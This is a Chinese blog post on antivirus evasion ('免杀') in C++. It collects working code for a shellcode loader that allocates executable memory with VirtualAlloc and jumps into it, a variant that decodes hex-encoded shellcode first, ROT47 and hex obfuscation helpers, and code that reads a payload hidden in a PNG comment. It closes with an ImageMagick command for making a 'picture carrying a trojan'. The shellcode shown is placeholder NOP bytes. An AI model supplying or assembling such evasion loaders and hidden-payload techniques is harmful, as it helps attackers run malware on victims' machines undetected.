C++免杀学习

基本的C++shell code加载器

#include <iostream>
#include <windows.h>

// 定义要执行的shellcode
unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90"; // 这里填入您的shellcode

int main() {
    // 将shellcode分配到可执行内存
    void* execMem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (execMem == NULL) {
        std::cerr << "内存分配失败" << std::endl;
        return 1;
    }
    // 将shellcode复制到可执行内存
    memcpy(execMem, shellcode, sizeof(shellcode));
    // 执行shellcode
    ((void(*)())execMem)();
    // 释放内存
    VirtualFree(execMem, 0, MEM_RELEASE);
    return 0;
}

C++判断主机是windows64还是32

#include <iostream>

int main() {
    #ifdef _WIN64
        std::cout << "64位Windows" << std::endl;
    #else
        std::cout << "32位Windows" << std::endl;
    #endif
    return 0;
}

C++ ROT47加密

std::string rot47Encrypt(const std::string& plainText) {
    std::string encryptedText = plainText;
    for (char& c : encryptedText) {
        if (c >= 33 && c <= 126) {
            c = 33 + ((c - 33 + 47) % 94);
        }
    }
    return encryptedText;
}

C++ ROT47解密

std::string rot47Decrypt(const std::string& encryptedText) {
    std::string decryptedText = encryptedText;
    for (char& c : decryptedText) {
        if (c >= 33 && c <= 126) {
            c = 33 + ((c - 33 + 47) % 94);
        }
    }
    return decryptedText;
}

C++ hex解码

#include <iostream>
#include <string>

std::string hexDecode(const std::string& hexString) {
    std::string decodedString;
    std::string byteString;
    for (size_t i = 0; i < hexString.length(); i += 2) {
        byteString = hexString.substr(i, 2);
        char byte = static_cast<char>(std::stoi(byteString, nullptr, 16));
        decodedString += byte;
    }
    return decodedString;
}

int main() {
    std::string hexString = "48656c6c6f2c20576f726c6421";
    std::string decodedString = hexDecode(hexString);
    std::cout << "Decoded String: " << decodedString << std::endl;
    return 0;
}

C++ Hex版shellcode加载进内存

#include <iostream>
#include <Windows.h>

// 十六进制格式的Shellcode
const char* hexShellcode = "9090909090..."; // 替换为你的Shellcode

int main() {
    // 将十六进制字符串转换为字节序列
    std::string hexString(hexShellcode);
    std::string byteString;
    std::vector<unsigned char> shellcodeBytes;
    for (size_t i = 0; i < hexString.length(); i += 2) {
        byteString = hexString.substr(i, 2);
        unsigned char byte = static_cast<unsigned char>(std::stoi(byteString, nullptr, 16));
        shellcodeBytes.push_back(byte);
    }
    // 分配可执行内存
    LPVOID execMemory = VirtualAlloc(NULL, shellcodeBytes.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execMemory == NULL) {
        std::cout << "Failed to allocate memory." << std::endl;
        return 1;
    }
    // 将Shellcode复制到分配的内存中
    memcpy(execMemory, shellcodeBytes.data(), shellcodeBytes.size());
    // 创建函数指针并执行Shellcode
    typedef void (*ShellcodeFunc)();
    ShellcodeFunc shellcodeFunc = reinterpret_cast<ShellcodeFunc>(execMemory);
    shellcodeFunc();
    // 释放内存
    VirtualFree(execMemory, 0, MEM_RELEASE);
    return 0;
}

C++将hex解码为字节组后输出

#include <iostream>
#include <string>
#include <vector>

int main() {
    std::string hexString = "hex内容";

    std::vector<unsigned char> byteSequence;
    for (size_t i = 0; i < hexString.length(); i += 2) {
        std::string byteString = hexString.substr(i, 2);
        unsigned char byte = static_cast<unsigned char>(std::stoi(byteString, nullptr, 16));
        byteSequence.push_back(byte);
    }
    // 输出字节序列的十六进制表示
    for (const auto& byte : byteSequence) {
        std::cout << std::hex << static_cast<int>(byte) << " ";
    }
    std::cout << std::endl;
    std::cout << "大小:" << byteSequence.size()<< std::endl;
    return 0;
}

获取图片注释内容

#include <iostream>
#include <fstream>
#include <string>
#include <regex>

std::string extractComment(const std::string& pngData) {
    std::regex commentRegex("comment(.*)qwqover");
    std::smatch match;
    std::string comment;

    if (std::regex_search(pngData, match, commentRegex)) {
        if (match.size() > 1) {
            comment = match.str(1);
        }
    }

    return comment;
}

std::string readPNGFile(const std::string& filename) {
    std::ifstream file(filename, std::ios::binary);
    std::string pngData;

    if (file) {
        file.seekg(0, std::ios::end);
        pngData.resize(file.tellg());
        file.seekg(0, std::ios::beg);
        file.read(&pngData[0], pngData.size());
        file.close();
    } else {
        std::cerr << "Failed to open file: " << filename << std::endl;
    }

    return pngData;
}

int main() {
    std::string filename = "example.png";
    std::string pngData = readPNGFile(filename);
    std::string comment = extractComment(pngData);

    std::cout << "Comment: " << comment << std::endl;

    return 0;
}

创建一个带马的图片

convert -comment "nihaozongzhongjiqwqover" -size 10x10 xc:white example.png

 

posted @ 2023-11-08 14:23  江城子!  阅读(189)  评论(0)    收藏  举报
levels of contents